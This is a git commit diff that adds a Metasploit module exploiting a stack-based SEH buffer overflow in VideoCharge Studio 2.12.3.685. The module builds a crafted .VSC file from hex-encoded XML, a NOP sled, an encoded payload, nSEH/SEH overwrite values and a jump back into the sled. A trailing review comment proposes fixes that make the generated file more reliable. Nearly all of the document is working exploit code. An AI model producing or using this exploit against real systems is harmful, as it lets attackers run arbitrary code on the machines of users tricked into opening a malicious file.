Added VideoCharge Studio File Format Exploit
parent
67f661823a
commit
28ad0fccbd
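--- /dev/null
+++ b/(unknown)
@@ -0,0 +1,92 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = NormalRanking
+
+include Msf::Exploit::FILEFORMAT
+include Msf::Exploit::Seh
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'VideoCharge Studio 2.12.3.685 Buffer Overflow (SEH)',
+'Description' => %q{
+This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when
+processing a specially crafted .VSC file. This vulnerability could be
+exploited by a remote attacker to execute arbitrary code on the target
+machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'metacom', # Original discovery
+'Andrew Smith', # MSF Module
+],
+'References' =>
+[
+[ 'OSVDB', '69616' ],
+[ 'CVE', '' ],
+[ 'EBD', '29234' ]
+],
+'DefaultOptions' =>
+{
+'ExitFunction' => 'process',
+},
+'Platform' => 'win',
+'Payload' =>
+{
+'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
+'DisableNops' => true,
+},
+
+'Targets' =>
+[
+[ 'VideoCharge Studio 2.12.3.685',
+{
+'Ret' => 0x61B811F1, #p/p/r | zlib1.dll
+'Offset' => 824
+}
+],
+],
+'Privileged' => false,
+'DisclosureDate' => 'Oct 27 2013',
+'DefaultTarget' => 0))
+
+register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.vsc']),], self.class)
+
+end
+
+def exploit
+
+buffer = "\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22"
+buffer << "\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x57\x69\x6E\x64\x6F\x77\x73\x2D\x31\x32"
+buffer << "\x35\x32\x22\x20\x3F\x3E\x3C\x63\x6F\x6E\x66\x69\x67\x20\x76\x65\x72\x3D\x22\x32\x2E"
+buffer << "\x31\x32\x2E\x33\x2E\x36\x38\x35\x22\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D"
+buffer << "\x65\x3D\x22\x46\x69\x6C\x65\x73\x22\x2F\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61"
+buffer << "\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x73\x22\x3E\x0A\x0A\x3C\x50\x72\x6F\x70"
+buffer << "\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x22\x3E\x0A"
+buffer << "\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x46\x6F\x72\x6D\x61\x74\x73\x22"
+buffer << "\x3E\x0A\x0A\x3C\x50\x72\x6F\x70\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x53\x74"
+buffer << "\x72\x65\x61\x6D\x22\x3E\x0A\x0A\x3C\x56\x61\x6C\x75\x65\x20\x6E\x61\x6D\x65\x3D\x22"
+buffer << "\x4E\x61\x6D\x65\x22\x20\x74\x79\x70\x65\x3D\x22\x38\x22\x20\x76\x61\x6C\x75\x65\x3D\x22"
+buffer << make_nops(target['Offset']-payload.encoded.length)
+buffer << payload.encoded
+buffer << "\xeb\x06\x90\x90" #nseh negative jump
+buffer << [target.ret].pack("V")
+buffer << "\xe9\x3f\xfd\xff\xff" #long jump
+buffer << "\x22\x2F\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F"
+buffer << "\x63\x6F\x6C\x73\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x52\x6F"
+buffer << "\x6D\x61\x6E\x69\x61\x20\x53\x65\x63\x75\x72\x69\x74\x79\x20\x54\x65\x61\x6D\x22\x2F"
+buffer << "\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6C"
+buffer << "\x73\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6E\x66\x69\x67\x3E"
+
+print_status("Creating '#{datastore['FILENAME']}' file ...")
+file_create(buffer)
+
+end
+end
+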
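Review bot: The 'Payload' hash in initialize() sets 'DisableNops' but no 'Space', so nothing stops a payload longer than the 824-byte 'Offset'; in exploit(), `make_nops(target['Offset']-payload.encoded.length)` then receives a negative count and the nSEH/SEH records end up misplaced in the generated file. By my arithmetic the long jump `"\xe9\x3f\xfd\xff\xff"` is at sled offset 832 and lands 700 bytes back, i.e. 132 bytes into the sled, so the payload must in fact fit in the upper 692 bytes of the 824-byte region — I would add `'Space' => 692,` beside `'DisableNops' => true,` so the framework rejects oversize payloads instead of silently emitting a broken .vsc. In 'References', `[ 'CVE', '' ]` is an empty entry that should be dropped unless a real identifier exists, and `'EBD'` looks like a typo for the `EDB` reference type, which would leave the Exploit-DB link unresolvable. The `#nseh negative jump` comment is also misleading: `"\xeb\x06"` is a short forward jump over the handler address; the backward jump is the `"\xe9"` one.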